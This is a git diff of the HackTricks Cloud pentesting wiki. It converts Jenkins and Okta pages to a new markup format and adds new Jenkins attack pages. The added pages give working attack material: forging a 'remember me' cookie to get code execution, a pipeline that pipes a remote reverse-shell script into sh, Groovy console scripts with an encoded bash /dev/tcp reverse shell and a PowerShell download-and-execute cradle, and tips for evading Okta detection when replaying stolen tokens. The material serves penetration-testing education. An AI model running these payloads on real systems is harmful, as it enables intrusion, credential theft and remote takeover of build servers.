+- [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
-{% hint
style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
similarity index 63%
rename from pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
rename to src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
index 43612a6e6..690b8b314 100644
--- a/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
+++ b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
@@ -1,19 +1,6 @@
 # Basic Jenkins Information
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 ## Access
@@ -41,30 +28,30 @@ This component provides a built-in SSH server for Jenkins. It’s an alternative
 In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options:
-* **Anyone can do anything**: Even anonymous access can administrate the server
-* **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
-* **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
-* **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
+- **Anyone can do anything**: Even anonymous access can administrate the server
+- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
+- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
+- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
-![](<../../.gitbook/assets/image (149).png>)
+![](<../../images/image (149).png>)
-* **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
-* **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
+- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
+- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
 ## **Security Realm**
 In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms:
-* **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
-* **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
-* **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
-* **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
+- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
+- **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
+- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
+- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
 Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as:
-* [Active Directory](https://plugins.jenkins.io/active-directory)
-* [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
-* [Atlassian Crowd 2](https://plugins.jenkins.io/crowd2)
+- [Active Directory](https://plugins.jenkins.io/active-directory)
+- [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
+- [Atlassian Crowd 2](https://plugins.jenkins.io/crowd2)
 ## Jenkins Nodes, Agents & Executors
@@ -82,9 +69,9 @@ An **executor** is a **slot for execution of tasks**; effectively, it is **a thr
 Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id.
 Common key ids include:
-* `hudson.util.Secret`: used for generic secrets;
-* `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
-* `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
+- `hudson.util.Secret`: used for generic secrets;
+- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
+- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
 ### Credentials Access
@@ -96,25 +83,12 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m
 ## References
-* [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/)
-* [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
-* [https://www.jenkins.io/doc/developer/security/secrets/](https://www.jenkins.io/doc/developer/security/secrets/)
-* [https://www.jenkins.io/blog/2019/02/21/credentials-masking/](https://www.jenkins.io/blog/2019/02/21/credentials-masking/)
-* [https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)
-* [https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)
-* [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
+- [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/)
+- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
+- [https://www.jenkins.io/doc/developer/security/secrets/](https://www.jenkins.io/doc/developer/security/secrets/)
+- [https://www.jenkins.io/blog/2019/02/21/credentials-masking/](https://www.jenkins.io/blog/2019/02/21/credentials-masking/)
+- [https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)
+- [https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)
+- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
new file mode 100644
index 000000000..1839878a1
--- /dev/null
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -0,0 +1,105 @@ +# Jenkins Arbitrary File Read to RCE via "Remember Me" + +{{#include ../../banners/hacktricks-training.md}} + +In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) + +This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own: + +### Attack Prerequisites + +- **Feature Requirement:** "Remember me" must be enabled (default setting). +- **Access Levels:** Attacker needs Overall/Read permissions. +- **Secret Access:** Ability to read both binary and textual content from key files. + +### Detailed Exploitation Process + +#### Step 1: Data Collection + +**User Information Retrieval** + +- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather: + - **Username** + - **User seed** + - **Timestamp** + - **Password hash** + +**Secret Key Extraction** + +- Extract cryptographic keys used for signing the cookie: + - **Secret Key:** `$JENKINS_HOME/secret.key` + - **Master Key:** `$JENKINS_HOME/secrets/master.key` + - **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` + +#### Step 2: Cookie Forging + +**Token Preparation** + +- **Calculate Token Expiry Time:** + + ```javascript + tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time + ``` + +- **Concatenate Data for Token:** + + ```javascript + token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey + ``` + +**MAC Key Decryption** + +- **Decrypt MAC Key File:** + + ```javascript + key = toAes128Key(masterKey) // Convert master key to AES128 key format + decrypted = AES.decrypt(macFile, key) // Decrypt the .mac 
file + if not decrypted.hasSuffix("::::MAGIC::::") + return ERROR; + macKey = decrypted.withoutSuffix("::::MAGIC::::") + ``` + +**Signature Computation** + +- **Compute HMAC SHA256:** + + ```javascript + mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key + tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string + ``` + +**Cookie Encoding** + +- **Generate Final Cookie:** + + ```javascript + cookie = base64.encode( + username + ":" + tokenExpiryTime + ":" + tokenSignature + ) // Base64 encode the cookie data + ``` + +#### Step 3: Code Execution + +**Session Authentication** + +- **Fetch CSRF and Session Tokens:** + - Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`. + - Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie. + +**Command Execution Request** + +- **Send a POST Request with Groovy Script:** + + ```bash + curl -X POST "$JENKINS_URL/scriptText" \ + --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ + --header "Jenkins-Crumb: $CRUMB" \ + --header "Content-Type: application/x-www-form-urlencoded" \ + --data-urlencode "script=$SCRIPT" + ``` + + - Groovy script can be used to execute system-level commands or other operations within the Jenkins environment. + +The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely. + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md similarity index 52% rename from pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md rename to src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md index 1d1b94715..035e24e4f 100644 
--- a/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
@@ -1,23 +1,9 @@
 # Jenkins Dumping Secrets from Groovy
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+{{#include ../../banners/hacktricks-training.md}}
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-{% hint style="warning" %}
-Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
-{% endhint %}
+> [!WARNING]
+> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
 You can **dump all the secrets from the Groovy Script console** in `/script` running this code
@@ -100,17 +86,4 @@ for (c in creds) {
 }
 ```
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
new file mode 100644
index 000000000..f34e83a69
--- /dev/null
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
@@ -0,0 +1,39 @@
+# Jenkins RCE Creating/Modifying Pipeline
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Creating a new Pipeline
+
+In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
+
+![](<../../images/image (235).png>)
+
+In the **Pipeline section** write the **reverse shell**:
+
+![](<../../images/image (285).png>)
+
+```groovy
+pipeline {
+ agent any
+
+ stages {
+ stage('Hello') {
+ steps {
+ sh '''
+ curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
+ '''
+ }
+ }
+ }
+}
+```
+
+Finally click on **Save**, and **Build Now** and the pipeline will be executed:
+
+![](<../../images/image (228).png>)
+
+## Modifying a Pipeline
+
+If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed.
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
new file mode 100644
index 000000000..6afbea340
--- /dev/null
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
@@ -0,0 +1,36 @@
+# Jenkins RCE Creating/Modifying Project
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Creating a Project
+
+This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
+
+1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
+2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._
+3. Click **Build now**
+ 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
+ 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`**
+
+![](<../../images/image (165).png>)
+
+## Modifying a Project
+
+Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
+
+![](<../../images/image (265).png>)
+
+If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others).
+
+Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
+
+## Execution
+
+If you are allowed to configure the project you can **make it execute commands when a build is successful**:
+
+![](<../../images/image (98).png>)
+
+Click on **Save** and **build** the project and your **command will be executed**.\
+If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
new file mode 100644
index 000000000..d7b9fa3eb
--- /dev/null
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
@@ -0,0 +1,63 @@
+# Jenkins RCE with Groovy Script
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Jenkins RCE with Groovy Script
+
+This is less noisy than creating a new project in Jenkins
+
+1. Go to _path_jenkins/script_
+2. Inside the text box introduce the script
+
+```python
+def process = "PowerShell.exe ".execute()
+println "Found text ${process.text}"
+```
+
+You could execute a command using: `cmd.exe /c dir`
+
+In **linux** you can do: **`"ls /".execute().text`**
+
+If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
+
+**Another useful groovy script** is (replace \[INSERT COMMAND]):
+
+```python
+def sout = new StringBuffer(), serr = new StringBuffer()
+def proc = '[INSERT COMMAND]'.execute()
+proc.consumeProcessOutput(sout, serr)
+proc.waitForOrKill(1000)
+println "out> $sout err> $serr"
+```
+
+### Reverse shell in linux
+
+```python
+def sout = new StringBuffer(), serr = new StringBuffer()
+def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
+proc.consumeProcessOutput(sout, serr)
+proc.waitForOrKill(1000)
+println "out> $sout err> $serr"
+```
+
+### Reverse shell in windows
+
+You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
+
+```python
+scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
+echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
+cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc
+```
+
+### Script
+
+You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
+
+You can use MSF to get a reverse shell:
+
+```
+msf> use exploit/multi/http/jenkins_script_console
+```
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/okta-security/README.md b/src/pentesting-ci-cd/okta-security/README.md similarity index 66% rename from pentesting-ci-cd/okta-security/README.md rename to src/pentesting-ci-cd/okta-security/README.md index ebb5511bf..10d34c1e4 100644 --- a/pentesting-ci-cd/okta-security/README.md +++ b/src/pentesting-ci-cd/okta-security/README.md @@ -1,19 +1,6 @@ # Okta Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Basic Information @@ -21,21 +8,19 @@ Learn & practice GCP Hacking: [!CAUTION] +> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**. -{% hint style="success" %} -To perform a security review of an Okta environment you should ask for **administrator read-only access**. -{% endhint %} +> [!TIP] +> To perform a security review of an Okta environment you should ask for **administrator read-only access**. ### Summary @@ -45,11 +30,10 @@ There are also **authenticators**: different options to authenticate like passwo Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application. -{% hint style="danger" %} -The most powerful role is **Super Administrator**. - -If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**. -{% endhint %} +> [!CAUTION] +> The most powerful role is **Super Administrator**. +> +> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**. ## Attacks @@ -96,7 +80,7 @@ Therefore, if the app is trusting the field **`userName`**, you probably won't b Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\ Therefore, the app should have this field enabled if it exists: -
+
I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently). 
@@ -108,36 +92,23 @@ Behavioral detection policies in Okta might be unknown until encountered, but ** Key recommendations include: -* **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens. -* Ensure **consistent user-agent strings** between the client and replayed access tokens. -* **Refrain from replaying** tokens from different users from the same IP address. -* Exercise caution when replaying tokens against the Okta dashboard. -* If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic. +- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens. +- Ensure **consistent user-agent strings** between the client and replayed access tokens. +- **Refrain from replaying** tokens from different users from the same IP address. +- Exercise caution when replaying tokens against the Okta dashboard. +- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic. 
## Okta Hardening Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible: -{% content-ref url="okta-hardening.md" %} -[okta-hardening.md](okta-hardening.md) -{% endcontent-ref %} +{{#ref}} +okta-hardening.md +{{#endref}} ## References -* [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers) -* [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) +- [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers) +- [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/okta-security/okta-hardening.md b/src/pentesting-ci-cd/okta-security/okta-hardening.md similarity index 73% rename from pentesting-ci-cd/okta-security/okta-hardening.md rename to src/pentesting-ci-cd/okta-security/okta-hardening.md index 806102163..231b4c822 100644 --- a/pentesting-ci-cd/okta-security/okta-hardening.md +++ b/src/pentesting-ci-cd/okta-security/okta-hardening.md @@ -1,19 +1,6 @@ # Okta Hardening -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Directory @@ -82,11 +69,11 @@ Here you can find all the **configured applications** and their details: Who has In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots: -
+
And you could see some more details about the app (like the password reveal feature, if it's enabled): -
+
## Identity Governance @@ -100,14 +87,14 @@ I haven't seen it used, but I guess that from a defensive point of view it's a n ### General -* **Security notification emails**: All should be enabled. -* **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha -* **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok) -* **User enumeration prevention**: Both should be enabled - * Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information): - * Self-Service Registration - * JIT flows with email authentication -* **Okta ThreatInsight settings**: Log and enforce security based on threat level +- **Security notification emails**: All should be enabled. +- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha +- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok) +- **User enumeration prevention**: Both should be enabled + - Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information): + - Self-Service Registration + - JIT flows with email authentication +- **Okta ThreatInsight settings**: Log and enforce security based on threat level ### HealthInsight @@ -119,7 +106,7 @@ Here you can find all the authentication methods that a user could use: Password In the **Enrollment** tab you can see how the ones that are required or optinal: -
+
It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn. @@ -133,7 +120,7 @@ Here you can find the **requirements to access each application**. It's recommen Here you can find the session policies assigned to different groups. For example: -
+
